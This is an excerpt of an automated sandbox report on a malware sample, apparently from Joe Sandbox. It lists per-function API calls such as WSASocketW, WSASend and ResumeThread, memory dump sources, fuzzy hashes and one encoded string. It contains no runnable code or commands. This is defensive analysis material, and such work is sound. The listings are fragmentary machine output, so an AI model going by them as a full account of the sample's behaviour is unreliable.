
                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00403F5A
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00403F54, 00403F59, 00403F61
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: ff27ec75a051114188215cfe400a4cbaf0c78fa13b69bb3fe721d448436fddd1
                            • Instruction ID: c9f98c8cbfcdd9fab2be9cf57d1fce3192d82ac0d695ce3633eb1dbab1b9471e
                            • Opcode Fuzzy Hash: ff27ec75a051114188215cfe400a4cbaf0c78fa13b69bb3fe721d448436fddd1
                            • Instruction Fuzzy Hash: D2C04C125956302D399532993C07DEE024E9D56720B56016FF544655D25C891C81C1FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041CF30
                            • __Thrd_sleep.LIBCPMT ref: 0041CF5E
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thrd_sleepUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 2189147043-0
                            • Opcode ID: 6ef084d886536efa36fb08816f2cde13a72646d32545107b0f6acc4ccb184032
                            • Instruction ID: a5553f93fda0dbafcf3dd2cc12bc55a76eae7f1fe9668aa702ce21b3fda4d9d8
                            • Opcode Fuzzy Hash: 6ef084d886536efa36fb08816f2cde13a72646d32545107b0f6acc4ccb184032
                            • Instruction Fuzzy Hash: EC1157325043109BD310EF698C81B57BFE9EFC9754F08462EB908BA151E6749980878A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
                            • String ID:
                            • API String ID: 3890610498-0
                            • Opcode ID: 8f4fab0dbd3d0f3dd64605a743e94dc0990d926ea59712ec9a4684316ceaeb30
                            • Instruction ID: 491d5e8be5114f4b240bc796e7f9e851366441774ff87c07463e96f67409059d
                            • Opcode Fuzzy Hash: 8f4fab0dbd3d0f3dd64605a743e94dc0990d926ea59712ec9a4684316ceaeb30
                            • Instruction Fuzzy Hash: 8A11E171300519BBDB218E54EC4AFAA7B65EF14324FD04106FA19862E0C77CDC61DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004219CE
                            • new.LIBCMT ref: 004219EB
                              • Part of subcall function 00421976: __EH_prolog.LIBCMT ref: 0042197B
                              • Part of subcall function 00421976: __Getctype.LIBCPMT ref: 004219A1
                              • Part of subcall function 00421059: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00421081
                              • Part of subcall function 00421059: std::_Lockit::~_Lockit.LIBCPMT ref: 0042110D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologstd::_$GetctypeLocinfo::_Locinfo_dtorLockitLockit::~_
                            • String ID:
                            • API String ID: 4122330132-0
                            • Opcode ID: b1b090d675cc00cb21eca32efbf5c1ae8e7c5696a35b0b42d348e107ef4bd08d
                            • Instruction ID: fbde2bd1481ce7c7b2cb5b6156cb7aef1863e66f145bda6bb614e2272a6a618c
                            • Opcode Fuzzy Hash: b1b090d675cc00cb21eca32efbf5c1ae8e7c5696a35b0b42d348e107ef4bd08d
                            • Instruction Fuzzy Hash: 3201C4B1A00229ABCB10EFA9E8817DEFB75FF64320F60422FE419A7291D7740A00C794
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateIoCompletionPort.KERNELBASE(?,?,00000000,00000000), ref: 00414DB0
                            • GetLastError.KERNEL32 ref: 00414DBA
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CompletionCreateErrorLastPort
                            • String ID:
                            • API String ID: 826170474-0
                            • Opcode ID: 0395236f40c99d132699d23732010481dfda0b7b115359d0289d3860ae94fd5e
                            • Instruction ID: 3ef129dfe6b8358e7d9be018ffa25797f26216bf5c787367d69216dd716af2eb
                            • Opcode Fuzzy Hash: 0395236f40c99d132699d23732010481dfda0b7b115359d0289d3860ae94fd5e
                            • Instruction Fuzzy Hash: B8016771A0060CAF8B11DFA9988059FBBA6EE45394714807AFC05E7211D6758E068BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,004B1F18), ref: 005CD651
                            • ResumeThread.KERNELBASE(?,?,?,?,?,?,00000000,004B1F18), ref: 005CD65F
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleResumeThread
                            • String ID:
                            • API String ID: 3265327148-0
                            • Opcode ID: 587545f191535425762d6d28ab2e1c6b4122220effc7f384eebce6fc1042a334
                            • Instruction ID: f0b4d82a862ce52bc9d00719d9f04750367e6593c9f3305768fec72d78e3c51c
                            • Opcode Fuzzy Hash: 587545f191535425762d6d28ab2e1c6b4122220effc7f384eebce6fc1042a334
                            • Instruction Fuzzy Hash: FFF04F712002019FDB109F99DCC5F56B7B8BF44325B14006AF919CB2A1E7B0A8D2DA64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415A36
                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 00415A69
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Socketsetsockopt
                            • String ID:
                            • API String ID: 4073417641-0
                            • Opcode ID: 3b90072e8cb81b3ca05c6826c9d39db1d776a69f4c37158aedfab5e15434e4a0
                            • Instruction ID: 663e49da4d4856ef2d3da6e005abff95531b9732195f4b7834f121d04bb2196b
                            • Opcode Fuzzy Hash: 3b90072e8cb81b3ca05c6826c9d39db1d776a69f4c37158aedfab5e15434e4a0
                            • Instruction Fuzzy Hash: 57F0B43A690218BBE63056188C8AFEE7659CB89B70F104316FE21A62C096F45D414195
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f9d6a7a2a6c329b8c658a31af58da615f691074d5fde15becd13cb46ea05feb
                            • Instruction ID: 3225706cb2ef8621140827d6974cb5288cc4a64a16b81056c02bd44edeb2d36d
                            • Opcode Fuzzy Hash: 5f9d6a7a2a6c329b8c658a31af58da615f691074d5fde15becd13cb46ea05feb
                            • Instruction Fuzzy Hash: 1BF0E2712142055ACB2CDB78985567B3B469F64324B208B3FFD2ADA9C0D739DD88830C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __Thrd_start.LIBCPMT ref: 00413F58
                              • Part of subcall function 00582E5D: std::_Throw_Cpp_error.LIBCPMT ref: 00582E84
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Cpp_errorThrd_startThrow_std::_
                            • String ID:
                            • API String ID: 1816819587-0
                            • Opcode ID: 482491daaff7d305f77c0e5da6f056b282fd6e02cfe2d2002e2a29a61db142d5
                            • Instruction ID: 001f3e7be6932ec7b589c578a32a9158c350cf8eb1f041a732ff9f2af810380e
                            • Opcode Fuzzy Hash: 482491daaff7d305f77c0e5da6f056b282fd6e02cfe2d2002e2a29a61db142d5
                            • Instruction Fuzzy Hash: E5E0D8319582117AEF1D2A259C07DE77E989F00B21B10847FF84A50461E95AEED24648
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041F2A7
                            • new.LIBCMT ref: 0041F2B0
                              • Part of subcall function 0041F2D9: __EH_prolog.LIBCMT ref: 0041F2DE
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 6ebccf465f2068dae9db6c70872b754fe6c16c801c080b51acb93c81b5b83211
                            • Instruction ID: 65a7a105255d853fcf43c732abe7d01ce016bef1e48f124c7a29f914fb7d0582
                            • Opcode Fuzzy Hash: 6ebccf465f2068dae9db6c70872b754fe6c16c801c080b51acb93c81b5b83211
                            • Instruction Fuzzy Hash: 14E0C270A40208ABDF18EFA8D8067BEBFB2EF40320F0083ADB815562C2DB790F408754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: a7c11de10b17c89fc47b0469581b3710ff41b2bdb42303edd2173ccc73ffcf01
                            • Instruction ID: bc131b28d82ea61ad7cf9e497848dc32f686f21abaa468e28f58667315e49527
                            • Opcode Fuzzy Hash: a7c11de10b17c89fc47b0469581b3710ff41b2bdb42303edd2173ccc73ffcf01
                            • Instruction Fuzzy Hash: D9319C3290450D9BCF10DF68C4416EEBBB1AF45324F11820EFC796B291C779AA96DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: f437b480993a3a4e36c19eed63c538f59a40f24988aa4aaa849d257e00facecb
                            • Instruction ID: 106f691d2cd4d388acc72c086b2a8801f6c7c68005dff5bca8a06f5e902c6d40
                            • Opcode Fuzzy Hash: f437b480993a3a4e36c19eed63c538f59a40f24988aa4aaa849d257e00facecb
                            • Instruction Fuzzy Hash: DE213771E042049BDB24CFA8DA407EEB7B1EF44720F10066EE821A73C0C3B46995C799
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 880b6969641372ef97a1c37eb609abc5c85798ce273f4fe36591dd4312caa178
                            • Instruction ID: 54ad5f8fa5d8eb183162b415b7c6747980d5435cbff71c2e7f2fa9c717b49fd3
                            • Opcode Fuzzy Hash: 880b6969641372ef97a1c37eb609abc5c85798ce273f4fe36591dd4312caa178
                            • Instruction Fuzzy Hash: E3310FB1905208DFCB14DFA9C5859DEBBF8FF08320F20826EE559E7291D7349A44CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041E7E1
                              • Part of subcall function 0041EC3F: __EH_prolog.LIBCMT ref: 0041EC44
                              • Part of subcall function 0041B39F: __EH_prolog.LIBCMT ref: 0041B3A4
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 69d80c1fab76551441c165aa58aeb84fe836f82ef7023ae4cb88200c85a04a33
                            • Instruction ID: 7e035398976a704261069b36eb36525f1a1acefc23991192ddd41c782832667d
                            • Opcode Fuzzy Hash: 69d80c1fab76551441c165aa58aeb84fe836f82ef7023ae4cb88200c85a04a33
                            • Instruction Fuzzy Hash: CF316B71A00748DFDB24EF76C445BEEBBA5EF44314F00881EE5AA87281DB782A45CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • setsockopt.WS2_32(?,0000FFFF,?,?,00000004), ref: 00415B03
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: setsockopt
                            • String ID:
                            • API String ID: 3981526788-0
                            • Opcode ID: 229b2676438b68199630548ea13f135a547bc85ac154036ae7c02f03ae255c6f
                            • Instruction ID: ee03ee346e80de96060b2f7dc48de22909011d28722b388b5a7a22666c16ff3a
                            • Opcode Fuzzy Hash: 229b2676438b68199630548ea13f135a547bc85ac154036ae7c02f03ae255c6f
                            • Instruction Fuzzy Hash: B011EF31644A17DBCF218E54C8806EB7B60AF853A1F108327F9689B2C0C778ECD187CA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DeleteCriticalSection.KERNEL32(?,?,?,00000000,006BAEF1,000000FF,?,Service already exists.), ref: 00414659
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalDeleteSection
                            • String ID:
                            • API String ID: 166494926-0
                            • Opcode ID: 1b74082bdb999b1137e2f235ce039dea415c4248285a52e984468e3686f9d612
                            • Instruction ID: c205b92e4670c4d4a9239502f0aa17f7a91c955e2e12e1d5caf8899e845fa433
                            • Opcode Fuzzy Hash: 1b74082bdb999b1137e2f235ce039dea415c4248285a52e984468e3686f9d612
                            • Instruction Fuzzy Hash: E511CE32600B10DFC724CF08D844B9AB7A4EF4AB20F15025EE91597780CB38AC418B88
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 004158F9
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Send
                            • String ID:
                            • API String ID: 121738739-0
                            • Opcode ID: 844c422e5eb378a7e0d29b4a214563c5546f25862673e465dbfc040dc78f2f9b
                            • Instruction ID: 9da11206683b960042a778e75a57ea9168890d1a14d1c1e5e2c37e50e1839dcd
                            • Opcode Fuzzy Hash: 844c422e5eb378a7e0d29b4a214563c5546f25862673e465dbfc040dc78f2f9b
                            • Instruction Fuzzy Hash: 69012FF0A00208FFDB209F61C8808EAB76CEB84374B10022BF80593380C738AD508796
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: f42449693ef1a47b6df4a5e2534d95c0e25e22352c546430f63f561eba1047ef
                            • Instruction ID: c14727fb24beb689e6f6779a32a4015c6038887e017dff5ea0652d04006fa9ed
                            • Opcode Fuzzy Hash: f42449693ef1a47b6df4a5e2534d95c0e25e22352c546430f63f561eba1047ef
                            • Instruction Fuzzy Hash: F8115771A01249CFCB61DF58C904B9ABBF5FF08314F1085AEE8988B351D3B19A40CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,006A9F0D,00000001,00000364,?,00694D4A,00787350,00000010), ref: 006A0703
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 3c23660a21ad2e462de00a57121c1483a83682750325c3113940d13b4d1180a9
                            • Instruction ID: 7e934bd5066ccc049f0f0c22338a0c4756a715c0b7e1c58434b19cc306e23a6d
                            • Opcode Fuzzy Hash: 3c23660a21ad2e462de00a57121c1483a83682750325c3113940d13b4d1180a9
                            • Instruction Fuzzy Hash: BDF0E931248624A7FF21BE619C05B9B375FAF837B0F145111F8099A690CA31EC118EE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041CF70
                              • Part of subcall function 0041EE30: __EH_prolog.LIBCMT ref: 0041EE35
                              • Part of subcall function 0041E7DC: __EH_prolog.LIBCMT ref: 0041E7E1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: d41f1522d6369eec75bdb53f6a55bbd161640743663369d0d822af88bb528957
                            • Instruction ID: 1cbb4bd097007db9c2494b7392ff96814d6381db4e84be9cf20203a5681cf52e
                            • Opcode Fuzzy Hash: d41f1522d6369eec75bdb53f6a55bbd161640743663369d0d822af88bb528957
                            • Instruction Fuzzy Hash: C0017C71A01108EFCB04EFA9C905AEEFBB9FF54314F10415EE805A7291CB749A41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Deallocatestd::_
                            • String ID:
                            • API String ID: 1323251999-0
                            • Opcode ID: a09d8e6614e738c7becca969bd72899a6773e9be4a855900a5f4ff7d8c32c2b1
                            • Instruction ID: fbdd84b15743c9219d8a27b68931acf2a1371eda055d287936f063f92b30fc3d
                            • Opcode Fuzzy Hash: a09d8e6614e738c7becca969bd72899a6773e9be4a855900a5f4ff7d8c32c2b1
                            • Instruction Fuzzy Hash: 49F0F6754007009AD7308F08A940B53F7ECEF85714F14092EEA8513611D375F98487E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 7e26deef796c43126ed51a1ca2e52b3206a359ae88f02c4dd00738d47b6216a6
                            • Instruction ID: 654992942dd4846e25231714a87aaac56a84a338c220e369bb60f0fbff998924
                            • Opcode Fuzzy Hash: 7e26deef796c43126ed51a1ca2e52b3206a359ae88f02c4dd00738d47b6216a6
                            • Instruction Fuzzy Hash: DBF06DF1D15219ABC7109F59C98199BFFBDFF58760B10821BB81893241D7B15E20CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 6b22095144da70cbec31f193c9388207d853bd3e62e9af16367f76d79eb0748f
                            • Instruction ID: 057aafb766249f32bd5b599ce166dd7925d9ac491e62c583bfb90a4e987c2369
                            • Opcode Fuzzy Hash: 6b22095144da70cbec31f193c9388207d853bd3e62e9af16367f76d79eb0748f
                            • Instruction Fuzzy Hash: 31E030251452A196EA7136659D04B9B3A9B9F433F0F150110A8459F292DE64AC818EB6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 004227D5: new.LIBCMT ref: 0042280B
                              • Part of subcall function 004227D5: std::locale::_Init.LIBCPMT ref: 00422815
                              • Part of subcall function 004AFD21: __EH_prolog.LIBCMT ref: 004AFD26
                            • std::ios_base::_Addstd.LIBCPMT ref: 004AF0B9
                              • Part of subcall function 004226AE: __EH_prolog.LIBCMT ref: 004226B3
                              • Part of subcall function 004226AE: __CxxThrowException@8.LIBVCRUNTIME ref: 004226D9
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$AddstdException@8InitThrowstd::ios_base::_std::locale::_
                            • String ID:
                            • API String ID: 2564750599-0
                            • Opcode ID: 3d901c01a1426a53dd42f28859e6fb9d9d7944a74d665e030c051e79394bef60
                            • Instruction ID: 7018a0c775b5a882920073ae86af83c4afe5ed78168e96d6e9dcefd3a99bd23a
                            • Opcode Fuzzy Hash: 3d901c01a1426a53dd42f28859e6fb9d9d7944a74d665e030c051e79394bef60
                            • Instruction Fuzzy Hash: B2F0EC326043146BE734A6B59449B5B7BD4AF11334F00441FF48257A82DAF9F4448B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004AFD26
                              • Part of subcall function 00422763: __EH_prolog.LIBCMT ref: 00422768
                              • Part of subcall function 004B02E0: __EH_prolog.LIBCMT ref: 004B02E5
                              • Part of subcall function 004B02E0: std::_Lockit::_Lockit.LIBCPMT ref: 004B02F4
                              • Part of subcall function 004B02E0: std::locale::_Getfacet.LIBCPMT ref: 004B0314
                              • Part of subcall function 004B02E0: std::_Lockit::~_Lockit.LIBCPMT ref: 004B036E
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Lockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                            • String ID:
                            • API String ID: 3055501177-0
                            • Opcode ID: c1d3582962254c774d239df827e698910983ea97e75e998fbf88abde84892987
                            • Instruction ID: ca78f803e55544c0ed65db2b3ac897056a71d1f714b11054642c2cd8e851af7c
                            • Opcode Fuzzy Hash: c1d3582962254c774d239df827e698910983ea97e75e998fbf88abde84892987
                            • Instruction Fuzzy Hash: 1FE06CB1900118EBCB18EFA4D94AAEEB779EF54311F10425EF415A3192D7345E01C6B8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
